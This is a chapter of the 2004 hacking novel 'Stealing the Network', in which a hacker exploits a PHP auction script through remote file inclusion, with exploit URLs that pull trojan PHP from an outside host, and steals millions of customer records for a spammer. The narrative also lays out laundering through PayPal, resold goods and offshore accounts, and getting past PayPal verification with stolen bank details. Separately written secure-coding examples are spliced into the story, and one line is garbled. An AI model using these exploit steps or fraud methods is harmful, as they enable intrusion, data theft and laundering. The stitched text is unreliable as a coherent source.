The Hunt


A quick targeted search on Google for "automotive buy sell inurl:.php" shows almost 1,500 results: automotive sites that have (somewhere on their site) a .PHP script.

Going through the list of scripts he sees some common names that are used on more than one domain.

 carsearch.php
 search.php
 auctionwizz.php
 carauction.php
 subscribe.php

"Interesting," the one that really caught his eye was auctionwizz.php. It sounded like a commercial product, not just a filename coincidence between sites. In all, three sites that sell car products online have auctionwizz.php: www.carbits.com, www.autobuysell.com, and www.speedracerparts.com. It seemed to be an automated auction manager, allowing customers to create an account, log in, and bid for products that others are selling, kind of like a global marketplace for car part traders. It generated revenue by charging the auctioneer $5 for each new product placed up for auction. Set up very much like eBay, it actually looked like a really nice application, especially for the web administrator, since all they have to do is host the script and attract customers in order to get income.

Judging from the "Powered by AuctionWizzard lite" banner at the bottom of every page, it seemed that they were all running the same application, and that this wasn't some bizarre filename coincidence.

"This is good news, as this gives me some common ground among these three sites. If I can find a flaw and successfully exploit AuctionWizzard (lite) I can hack the three sites at once. This will greatly reduce the time I have to spend hacking, and allows me to perform a very smooth, calculated hack by being able to research my target fully, then hopefully exploit one after the other without any problems."

A Google search on "AuctionWizzard lite" brought up the author company, Jackstone Software, located in Seattle. They offer a free lite version and a heavier professional version for $50 that contains more advanced plug-ins.

Eager to start his flaw-finding rampage, Dex begins frantically searching for a download link on their Web site; a mass of registration forms and e-mail links later, he has the 300k .gz file containing all the source code to AuctionWizzard lite, written in PHP. Auction_wizzlite.gz contains 57 files; mostly, these seem to be HTML styles, various skins, a suite of example plug-ins, and of course the core PHP application.

The files and directories that held a lot of interest for him were:

 Setup/setup-schema.sql
 core/plugins.php
 core/core.php
 login/login.php
 legacy/legacy_plugins.php
 plugins/

"These files and directories will be a great place to start!" he thought.

Setup-schema.sql contains all the SQL you would run to set up the database. It would be essential for him to know how the data is structured in the database, since he has to obtain each user's full demographic information and so would have to navigate the database with some ease.

"The more information I have, the better. I don't want to be stumbling blindly around the database of a compromised server."

The other PHP files will hopefully contain the deep and niggly code that any application has: the kind that is written at 4 a.m. after an 18-hour caffeine binge, filled with illogical loops, cryptically named variables, and hopefully just a few hidden bugs he could exploit. Legacy code is also a great place to start; code that has not been touched for a few years will probably be written in an outdated development style.

He held the idea that the fundamentals of code development were constantly evolving. Year by year, programmers learn how to write better code, more knowledge is shared about the development process, and usually security improves as both the language and the technology progress. This is mostly spurred by people finding new ways to break code and exploit the weaknesses of a particular style in some new, bizarre fashion. He remembered that in 1997 SQL injection attacks were very uncommon, as database integration was something very new to many, and not many people really knew much about how a database even worked. Windows exploit shellcode was also very rare even a few years ago, as very few people bothered coding around the win32 API and very little knowledge was published on the subject.

Today, however, is a very different story. All you have to do is glance at any security news site to see the latest Web application containing an SQL injection flaw that someone has been able to exploit, or the latest published Windows-based exploit code, indicating that exploit coders have (finally) learned how to write efficient win32 assembly for stack and buffer overflow scenarios.

With that in mind, legacy code is just a way of saying "I'm old and weak," and was sure to turn up some good logic flaws and insecure programming techniques.

And So It Begins

The PHP code is written in a well-structured, well-formatted style. Logical and hierarchical variable names are used, and in all, it was a pleasure to read. There were, however, some rather obvious flaws lurking.

To start, there is the usual swag of SQL injection flaws from user-supplied data:

Login.php: line 513

 $query = "select access from users where user = '$user' and password = '$password'";

core.php: Line 10

 $query = "select price, seller, information from products where productid = $prodid"; 

Although there is a rather good query inspector in place that would stop any SQL injection from taking place, it is strangely not called for these two SQL queries. Probably someone just forgot and added a quick raw call.
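The two raw queries above, rewritten as an added example (not code from the book or from AuctionWizzard) the way the bypassed query inspector would have wanted them: the values are bound as parameters instead of being interpolated into the SQL string. The example assumes a PDO connection `$pdo` to the auction database and a `password_hash` column in `users` holding a `password_hash()` digest rather than the plaintext password the original compares against; both are assumptions for illustration.

```php
<?php
// Added example, not AuctionWizzard code: the login.php and core.php
// queries rebuilt as prepared statements.  $pdo is an assumed PDO handle.
//
// BEFORE (as quoted from the book): input is interpolated straight into SQL.
//   $query = "select access from users where user = '$user' and password = '$password'";
//   $query = "select price, seller, information from products where productid = $prodid";

/**
 * Look up a user's access level.  The placeholder keeps quoting inside the
 * driver, so a value such as  ' or '1'='1  is matched as a literal string,
 * never parsed as SQL.  Returns the access level, or null on bad credentials.
 * (Assumes a password_hash column instead of a plaintext password column.)
 */
function lookupAccess(PDO $pdo, string $user, string $password): ?string
{
    $stmt = $pdo->prepare(
        'SELECT access, password_hash FROM users WHERE user = :user'
    );
    $stmt->execute([':user' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    return $row['access'];
}

/**
 * Fetch one product.  The id must be all digits before it is bound as an
 * integer, so "1 OR 1=1" style input never reaches the database at all.
 */
function fetchProduct(PDO $pdo, $prodid): ?array
{
    if (!ctype_digit((string) $prodid)) {
        return null;            // reject anything that is not a plain number
    }
    $stmt = $pdo->prepare(
        'SELECT price, seller, information FROM products WHERE productid = :id'
    );
    $stmt->bindValue(':id', (int) $prodid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage from a request handler (assumed):
//   $product = fetchProduct($pdo, $_GET['prodid'] ?? '');
//   $access  = lookupAccess($pdo, $_POST['user'] ?? '', $_POST['password'] ?? '');
```

The point is that the query text is fixed at prepare time, so the "query inspector" the book mentions becomes unnecessary for these two calls: there is no string for an attacker's input to alter.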

There was also some exploitable cross-site scripting. Since no sanitizing of the auctioned item description is performed, an attacker posting a new auction would be able to place JavaScript code inside the auctioned item and use it to hijack client cookies or redirect users to another site, possibly to harvest accounts.

"Small flaws on the scale of things; however, I could use the SQL injection to query all the customer information. I guess I really want to find something else, though, something juicier. The joy of PHP is the easy access it gives you to system sockets, commands, and files. This usually results in a system shell with a bit of time and luck: if you give a man a bone he will turn it into a gun and shoot you in the back, eventually."

Dex went back to work, digging deeper into the mass of code. "Interesting."

 core.php

 /* Including a user defined style-sheet for each skin */
 include(parse_userdata($input_style_dir) . $input_style_file . ".css");

 function parse_userdata($input_data) {
     /* strip every '.' from the value before it is used in the include path */
     $safedata = preg_replace("/\./", "", $input_data);
     return($safedata);
 }

This code seems to control the skinning engine, allowing developers to have different style sheets for users, selected by data posted within the Web page.

There was input validation performed on $input_style_dir using the function parse_userdata(). The function removes all '.' characters, eliminating the chance of a directory traversal attack there when opening the include file.

Error messages seem to be returned directly to the user, though. By passing a nonexistent style_dir or style_file, I am greeted with a nice error message.

 http://www.example.com/auctionwizz/index.php?style_dir=aaa&style_file=aaa

 Warning: main(): Failed opening '/home/virtual/jskew/home/httpd/html/auctionwizz/styles/aaa/aaa.css' for inclusion (include_path='.:/php/includes:/usr/share/php:/usr/share/pear') in /home/virtual/jskew/home/httpd/html/auctionwizz/core.php on line 419

The first noticeable flaw in this code snippet is the fact that the $style_file variable is not parsed for dots, whereas $style_dir is.

"I could easily pass ../../../../../a into style_file and the server would try to include /home/virtual/jskew/home/httpd/a.css."

"The only real problem here is the fact that whatever file I try to open has to end in .css. That's not so useful to me, considering .css files are plain-text style sheets that usually contain only boring HTML layout information; none are executable."

On the up-side, it had disclosed a little information; he now knew the current working directory on this server.

"Every small bit of information does help, although I do think there is more to this exploit. I am, after all, now able to control one variable fully, and have decent control over another. Second, the server will run whatever these variables point to. If I could make them run some evil PHP code, they would."

Dex fires up a web browser, goes to www.php.net and reads up on the features of including files.

"Maybe there is a way I can get rid of the .css," he mumbles, "or somehow open a socket or pipe to another application on the system," he says out loud.

He thought, "Remote included files; included in PHP v4.06 and above. Remote included files allow you to call a remote web server that may hold the required code you wish to run. This is obtained using a remote fopen call and can use either the ftp:// or http:// protocol, for example: include 'http://www.example.com/test.html'."

Dex began to get excited, hopping around on his old, tired, broken computer chair. "That's it! If I am able to make the server include some Trojan code sitting on another server of mine, that, in fact, ends in .CSS but returns PHP code, it should run the PHP code on their server. So,"

 www.carbits.com/auctionwizz/index.php?style_dir=http://&style_file=www.private-server.com/test 

would result in:

 include('http://' . 'www.private-server.com/test'. '.css'); 

"No parsing would take place, since I don't enter any dots in the style_dir portion."

Dex placed a sample Trojan test.css on his server house-el-home.com with the following body:

 <? $var = `id`; print($var); ?> 

Then he called www.carbits.com/auctionwizz/index.php?style_dir=http://&style_file=www.private-server.com/test. The standard auction front page loaded, looking very scrambled from having no skin data. However, in the middle of the page sat:

 uid=99(nobody) gid=99(nobody) groups=99(nobody) 

"It worked!" Dex shouts.

"www.carbits.com connected to my house-el-home.com server and inserted the code from the .CSS into the stack of code to parse for the page to load. However, the .CSS had PHP interpretation tags around its body (<? ?>), so PHP parsed the file locally as a script on the server and told me the result (the user running Apache on www.carbits.com). Now the server will do anything I tell it to; all I have to do is place the exploit code somewhere it can reach it."
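A skin loader that closes both holes in the core.php snippet, the unfiltered $style_file (directory traversal) and the http:// remote include, written here as an added example. It is not AuctionWizzard's code, and STYLE_ROOT, the ALLOWED_SKINS list and the function names are assumptions for illustration. The design point is that a style sheet is data to be served, never code to be include()d, so even a .css that "returns PHP code" is just echoed as text; three independent path checks and two php.ini settings back that up.

```php
<?php
// Added example, not AuctionWizzard code.  STYLE_ROOT and ALLOWED_SKINS are
// assumed values standing in for the application's real skin directory.

const STYLE_ROOT    = __DIR__ . '/styles';           // assumed skin directory
const ALLOWED_SKINS = ['default', 'blue2', 'dark'];  // assumed skin names

/**
 * Resolve a user-chosen skin to a real file under STYLE_ROOT, or null.
 *
 * Any one of these checks alone would have stopped the attack in the text:
 *  1. the skin name must be on a fixed allowlist, so "http://" is rejected
 *     before it can ever form a URL wrapper;
 *  2. the style file name is reduced to its basename and restricted to a
 *     safe character set, so "../../../../../a" collapses to "a";
 *  3. the resolved real path must still begin with STYLE_ROOT, which catches
 *     anything the first two checks did not anticipate (symlinks included).
 */
function resolveStyleSheet(string $styleDir, string $styleFile): ?string
{
    if (!in_array($styleDir, ALLOWED_SKINS, true)) {
        return null;
    }
    $file = basename($styleFile);                    // drops any directory part
    if ($file === '' || !preg_match('/^[A-Za-z0-9_-]+$/', $file)) {
        return null;
    }
    $path = realpath(STYLE_ROOT . '/' . $styleDir . '/' . $file . '.css');
    $root = realpath(STYLE_ROOT);
    if ($path === false || $root === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Serve the style sheet as plain text.  readfile() copies bytes to the
 * client; unlike include(), it never hands them to the PHP interpreter,
 * so a "<? ... ?>" body in the file is displayed, not executed.
 */
function emitStyleSheet(string $styleDir, string $styleFile): void
{
    $path = resolveStyleSheet($styleDir, $styleFile);
    if ($path === null) {
        // A bare 404: no "Failed opening /home/virtual/..." path leaks back
        // to the requester the way the original warning did.
        http_response_code(404);
        return;
    }
    header('Content-Type: text/css');
    readfile($path);
}

// Usage from the front controller (assumed request parameters):
//   emitStyleSheet($_GET['style_dir'] ?? 'default', $_GET['style_file'] ?? 'main');
//
// Server-side settings that apply independently of the code above:
//   php.ini:  allow_url_include = Off   ; include()/require() refuse http:// and ftp://
//   php.ini:  display_errors    = Off   ; warnings go to the error log, not the page
```

Of the three checks, the allowlist is the one that maps most directly onto the book's flaw: parse_userdata() tried to make $style_dir safe by deleting dots, but "http://" contains no dots, so a blacklist of one character was always going to miss a wrapper scheme. The allowlist asks the opposite question, "is this one of the skins we ship?", and everything not on the list fails closed.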

"Ah, delight, that took almost an hour to find. And there is now very little work left in it." Dex pours yet another cup of coffee, his hands jittering steadily with caffeine and excitement.

"Now to write some exploit code. I have to keep in mind that the only thing I want from this exploit is every user's demographic information. I am not out to deface, Denial of Service, or backdoor these servers."

"So I think the easiest, smoothest way to get all the customer data would be to write another PHP script (kept on my server). This PHP script would include config.php (which contains the database username, password, table, and database name), then simply have a little raw SQL to select out all the database fields of every user and print them all."

"This leaves little or no trace, since there will be only one connection to the server and this can be done through a chain of SOCKS proxies. Plus I can keep the Trojan PHP code on a free Web host somewhere."

It was, after all, just a .CSS. Dex began to write the Trojan PHP code, and with the help of the full database schema it did not take long.

First, config.php is included (from the local machine). Then a connection to the database is made (using the variables imported from config.php). Then the full name, address, country, e-mail, and age are selected, where the credit card number is not null. "I don't have any need for the actual credit card number, but I do want to make sure that every user has a credit card." The file is then saved as blue2.css (the name of one of the skins provided in AuctionWizzard) and uploaded to a free Web host (www.freehosting.com/raygun/blue2.css).

Hopefully this will not seem so obvious if someone finds the URL in a web server log. Time for some fun. An evil grin creeps over Dex's face. "I don't know if I should be proud of being a spacker (a hacker that hacks for spammers) or not."

A visit to a large anonymity site provides some decently fast insecure proxy servers: one in Brazil, another in China, and a third in Estonia. Good geographical distance between all three, plus language barriers should guarantee a very hard-to-follow trace.

A local proxy server chain is created, where all traffic is sent through the three proxy servers in series on its way to the destination host. The downside of this is speed; sending data to three slow hosts in weird parts of the world is by no means efficient, but it does provide a good level of anonymity. Time for action.

 www.carbits.com/auctionwizz/index.php?style_dir=http://&style_file=www.freehosting.com/raygun/blue2 

The page slowly loads as the traffic is sent around the globe. Ten seconds pass, fifteen, twenty. Then pages of data begin spewing over Dex's browser: names, addresses, e-mails, in a handy, easy-to-read format.

"Yes!" Dex shouts, trying not to sound like he had any doubt in his own work.

The full list takes almost five minutes to download, showing the massive number of customers this particular site has. A total of 1.5 million contacts were obtained from carbits.com. The same URL was called for www.autobuysell.com and www.speedracerparts.com, leaving one impressive text file containing just over 8.9 million contacts. "This should fetch a decent price. I would be looking at at least $6,000, maybe up to $7,000 for the whole list."

An e-mail is written back to Ralph informing him of the list, and how payment can be made.

 Ralph,

 You can find the contact list at www.freehosting.com/raygun/contacts.txt. There are just over 8.9 million in the list (pipe-delimited values). Everyone there is interested in buying/selling car products and has valid credit cards. I think ,500 USD is a fair price (if you agree); would be good if you could make the payment to my PayPal account roger_dodger@mailhost.com.

 Thanks a lot,
 Dex

"PayPal is a great money medium: by being really a virtual bank and by needing only a credit card to fully authorize your PayPal account, it works perfectly with my debit cards."

The primary card he used for PayPal transactions was his epassport card (www.epassport.com). Epassport is another debit card, so PayPal authorization works fine. PayPal works pretty well, but with limits on the amount of money you can send until you prove who you are by adding details of another bank account to your account. A secret authorization key is billed to your credit card and is viewable in your statement; you enter it online, and your account is then unlocked and can send unlimited amounts of money. This is easy to bypass, though, since all you needed to do was obtain access to someone's online bank account or statements and credit card details and simply use them to authorize you, or use a real credit card under a different name (such as a debit card).

"Once the money is in my PayPal account I face a new problem: how do I get it out?"

The only option to get money out of PayPal is to wire transfer it to an account in the same name somewhere.

"I really don't like doing that from a large company such as PayPal. It's too risky; plus I bet the FBI/CIA have full access to PayPal logs. So that leaves one thing left to do: spend the money."

Most online merchants now accept PayPal payments. Because they are instant, risk-free, and fraud-free, incentives are often offered to customers who can pay with PayPal instead of credit cards.

"I will spend the money on IT gear, cheap hard drives, graphics cards, cell phones, iPAQs, etc., out of my PayPal account. Once I have the products I will place them for sale on eBay."

These act as easily liquefiable assets that could be used to obfuscate the source of the money. Plus, if he were able to get a good deal on the product from the supplier, he could stand to make another 10 percent profit when he auctioned it. When the product is sold he would instruct the buyer to send the money via a wire transfer to his American bank account, or a money order.

"The amount of money is in small enough amounts that I don't really worry about the government seeing it; plus I need to pay some bills locally."

Once everything is paid for he would then wire what's left of the cash to his offshore account in the Caymans. The money has now been through a few hands. The idea is simple, though: buy products that act as cash. IT gear runs little risk since so many people are interested in it. However, you have to be quick or your assets will devalue and turn to dust within a month or two.

A day later Dex gets an e-mail back from Ralph, who is pleased with the customer list and agrees on the set amount, but payment will not be until the end of the week. Dex puts his feet up and relaxes, some good money made this week, plus the sun is shining now. "I think I'll go outside for a walk, get a coffee, enjoy the day, nothing to do till next week."

Just as he opens the front door he is confronted by an old friend, known only as Jack. Jack is a weasely-looking man in his mid-twenties who spent far too much time and money on heroin and cocaine. His pale white skin and sunken red eyes showed the scars of a bad drug addiction.

"Jack, long time, no see, come in," Dex cheerfully says.

Dex leads Jack in, as Jack nervously peers around every corner.

"A little paranoid there, Jack? Relax a little, man, it's me," Dex says comfortingly.

"I... I came by last week, you were, gone," Jack stutters.

"Ah, it was Jack that was creeping around my door; that explains why my building manager was worried. This guy looks like an escaped mental patient, complete with a crazed look in his eye," Dex thinks.

Dex leads Jack in and tells him to sit down and relax. Jack does not relax, and instead wanders around checking the windows for any suspicious activity.

How he met Jack was another tale, but suffice it to say, Jack used to be a very smart hacker doing work for some of the largest dot-coms at the time, and was rumored to have had multiple job offers from the FBI and NSA for his skills in exploit design and cutting-edge security techniques. This guy was hot, very hot.

The only problem was his drug habit; Jack had made a lot of money from hacking and had been led into some crowds of people who had fed him a few too many mind-altering substances. "A few too many" is one way of putting it: Jack could hardly write code now, always scared that his keyboard was secretly a key logger sending signals to the CIA about his whereabouts.

There is a very fine line between brilliance and insanity. Sadly, Jack had stepped over, way over, that line too many times, leaving a jabbering, paranoid maniac.

"So Jack, what brings you to my neck of the woods?" Dex says.

"Ok, so, like, here's the deal. The word is, like, from some friends of mine, that there is someone with some cash, like a lot. I'm talking a lot of cash, so much he could buy half the oil in the free world, and well, he wasn't exactly given this money. It's not like he stole it or anything, or maybe he did, it's not like someone misses it or anything," Jack babbles.

"Ok, so go on."

"Yeah, so, yeah, he has, like, all this money sitting in an account. And he's scared, because he's a paranoid freak that thinks, like, the world is going to swallow him up the second he touches the money."

"Man, pot calling the kettle black here. Trying to get sense out of this guy is impossible!"

"Ok, so he's scared someone is going to notice this money that he 'borrowed,' Jack?" Dex calmly says.

"Yeah, I know you're, like, god, no, delete that, Buddha of money. Never seen anything like the stuff you pull off, Dex, you're great. Thing is, right, he's looking for someone to lose all his money for him. Like everywhere, lose it in raindrops and under pillowcases if need be, but then, like, find it all again, and have it nice, clean, and folded-like."

"Folded? I seriously think Jack is on something at the moment; he's making as much sense as a lemon," Dex thinks.

"You mean, he's looking for someone to launder his money? Who is this guy, Jack?"

"I can't tell you, well I don't know, well, he's not anyone you know. He's from some very black hat underground crowds. Shady people who deal in shadows and smoke cigarettes, Mr. X and Mr. C style; you can trust them, though."

"I consider myself to be a rather dodgy person, but 'dealing in shadows'? This sounds over even my head, and Jack does not fill me with any sort of confidence," Dex thinks.

"I don't know, Jack; it sounds a little too deep for me. How much money are we talking about here? Thousands, hundreds of thousands?"

"Hahaha, no way! We're talking hundreds of millions. This guy has a pile of cash so big, and he's sitting on it like some angry hen that just laid an egg she can't eat."

Dex's jaw drops. "Hundreds of millions? You're kidding me, hundreds of millions? No way, this can't be for real. No one steals that much money; no, no one gets away with stealing that much money. What's more, people tend to miss an amount of money that size, usually a lot."

"The deal is this, man. If you can put his money through a wringer, scrub it so clean you can see your face in it, when it comes out the other side, you get to keep one percent of the total," says Jack.

"Ok, instantly I am interested. A few million US dollars for one job. OK, it's a risky job that will probably put me in jail for the rest of my life. But that much money, I could buy a house somewhere warm and retire. Not have to live by the skin of my teeth week by week. Could I do it? Could I launder that much? The most I have ever done before was $25,000; it wasn't hard, but not exactly easy," Dex thinks. Out loud he says, "I, I don't know, Jack, can I talk to this guy and get some more details? I need to be sure what kind of a person he is. This is my neck on the line if this goes pear-shaped, you know."

"This guy must be either brain-dead stupid or insane. How the heck did he steal that much to start with? That's a very sizeable amount of money and would leave a very distinct trail behind it," he thinks.

"Yeah, I can have him call your, hmm, your, hmm..." Jack stumbles, his mind stopped in mid-sentence.

"My cell phone?" Dex fills in.

"Yeah, he'll call that in a day or so, OK?" says Jack.

"Great, man, I'll let you know how it all goes. I guess thanks for the heads up. Man, hmm, take it easy, Jack, OK? You seem a little tired. Try to get some sleep and relax. Hey, you got my cell phone number, right?"

"Yeah, I do. I best be off now anyway; I have to see someone about a package on my way home. It's Tuesday today, right?" says Jack as he wanders out the door.

"I worry about Jack; he's just not right upstairs anymore. His lights are on, someone's definitely home, but that someone is hitting their head repeatedly on the wall." Dex decides to go out for a bit, catch up on some fresh air and food, and window-shopping is not half bad in this town.

As dusk draws in he decides on catching a brief nap, then attacking the city at night. This city is filled with great music; his favorite is immersive trance, soul-lifting beats mixed with progressive euphoria. Trance music and hacking just seem to go together, a cyberistic feel all around you, a slow and steady mind-bending feeling, fueled by various visual hallucinogens and body stimulants.

After retiring to bed for three or four hours Dex slipped into the night of the city, arriving at his favorite club at 11 p.m., which is full of loud music and strange people, but no computers.

At 3 a.m. something strange happened; his back pocket began to make sounds. Jingling and vibrating, Dex found this to be most disturbing.

So disturbing, in fact, that he left the club and stood outside, and reaching into his pocket he found his cell phone. Ah, it made a little more sense now; his cell phone was trying to communicate with him. Then the sound began again; the small object emitted a high-pitched jingle and various tones of light flashed out of it, while it hopped frantically around his hand like some small, excited animal.

Dex mangled a few of the buttons and placed the phone to his ear.

"Hello?" he nervously said, not knowing what to expect.

"Hello Dex, I am Knuth. Jack sent me," said a deep voice on the other end.

Reality came flashing back, Jack, the money, laundering, the coffee, the hacking.

"Knuth, yes, sorry, yes. I was just out somewhere," Dex says, slowly tripping over each word.

"That's fine, is this a bad time? Or can you talk? I can call you back tomorrow," Knuth said.

"Hmm, yes, please do. Can you call me around 1 p.m.? We can talk then. I am very interested in your project, though. I think I can be of some assistance to you," says Dex.

"I am most pleased; I will call you tomorrow then."

The phone is silent once more as if the event never happened. Dex is unsure if it really did happen; everything felt far too surreal to be reality right now. "I think I need to go to bed," he grumbled.

In the morning reality is reality again, the coffee strong, the floor cold.

Dex places his cell phone within audible distance and begins to make some breakfast.

No sooner had he left his cell phone when it began to ring.

"Hello," he said.

"Dex, Knuth again. Are you OK today?"

"Yeah, sorry about last night. Don't really know where I was with that."

"That's OK; I would really like to talk to you about what Jack spoke about, but not from here. Can you go down the street to the nearest payphone and call me on this number: 430-8276-8921? I'll be there for the next half hour."

"Ok." Click.

"I guess when you're dealing with this much money you get a little paranoid; fair enough, cell phones are not hard to tap these days anyway. Trusty payphones are still rather anonymous, though." Dex wanders down the road and calls the number from the nearest payphone.

"Hi, I have a pizza here for Knuth?" he says.

"Very funny, but thanks. I have to be very careful; no doubt Jack has told you about what my project is. And no doubt you have some idea which law enforcement agencies would already be sniffing around me."

"Yeah, I could imagine a few."

"I'll cut to the chase. I have a lot of money I need laundered and I hear you can do it."

"I've been known to do a little of that from time to time, yes."

"Well, this isn't a little, and I need it done right. This represents the effort of a lot of people, and the amount is sizeable. I need to know right now if you can do it."

Dex thinks, "Who does this guy think he is? I need time to think here."

"How much are we talking about here? And what kind of laundering do you need done?" Dex asks.

"Over $300 million, up to $500 million. I need the money spread out and moved quickly; go through as many chains and loops as possible, it has to be very clean. The money must end up in South America for me to pick up, though, and it must end up there in less than two months. It can't be late."

"And my cut?"

"I'll give you one percent of the total; just tell me an account and I'll move it in gradually as the money appears in the other accounts. If you can do better than 95 percent, we can talk bonus."

Dex ponders for a second. "Do I?"

"Well? Are you in?"

Risk, money, risk. Dex was bought. His fear had been surpassed by the chance of making a few million dollars.

"Yes, I'll do it. But I will need some money up front to help set up accounts and identities. This is no small task, you know. It has to be done correctly, and that costs, a lot."

"How much, and where?"

Dex thinks for a second; moving this much money around is not easy. Although smaller amounts work fine and usually go unnoticed, large amounts (over a million) are easily noticed.

He thinks, "I will need to open real bank accounts, no debit cards or PayPal accounts this time. For this, I will need fake identification made: passports, birth certificates and drivers' licenses. They aren't hard for me to get since I have some great contacts. The problem is the price; it's not cheap at all. To buy a full persona might cost $10,000. Something tells me I will need a few of them made, too."

"Two hundred thousand US dollars, in the largest notes possible, please," Dex says, not knowing what the response to that would be.

"That's fine; I will have someone deliver the money to you this week. And Dex, I really hope you don't try to rip me off here. I am, well, a very powerful man, and it would not be advisable to be on my bad side. For you, or for your friends and family. Do you understand me, Dex?"

"Yes, don't worry about a thing. I understand." To himself, he thinks, "How come I feel like I am sinking all of a sudden, as though the ground is trying to swallow me up and some part of me is trying as hard as possible to resist? This better work."

"I will have the money delivered to your home."

"I would prefer somewhere else, to be honest," says Dex.

"No, your home or no money," Knuth snaps.

"Oh, OK then," Dex hesitantly says, "I'm at..."

"You're at 910 23rd Street, cross street 9th Avenue. You're in apartment 402; your bedroom window faces east onto the fire escape. My partner knows where to find you, and what you look like. No need to worry about mistaken identity," replied Knuth. "Don't worry, Dex, I am a nice person, to people who treat me with respect. If you work for me, you will be a very rich man. A very rich man indeed."

Click. The phone goes dead.

Dex got the feeling he was dealing with something over his head here. He just hoped that by the end of this he still had a head to go over.


Stealing the Network. How to Own a Continent
ISBN: 1931836051
Year: 2004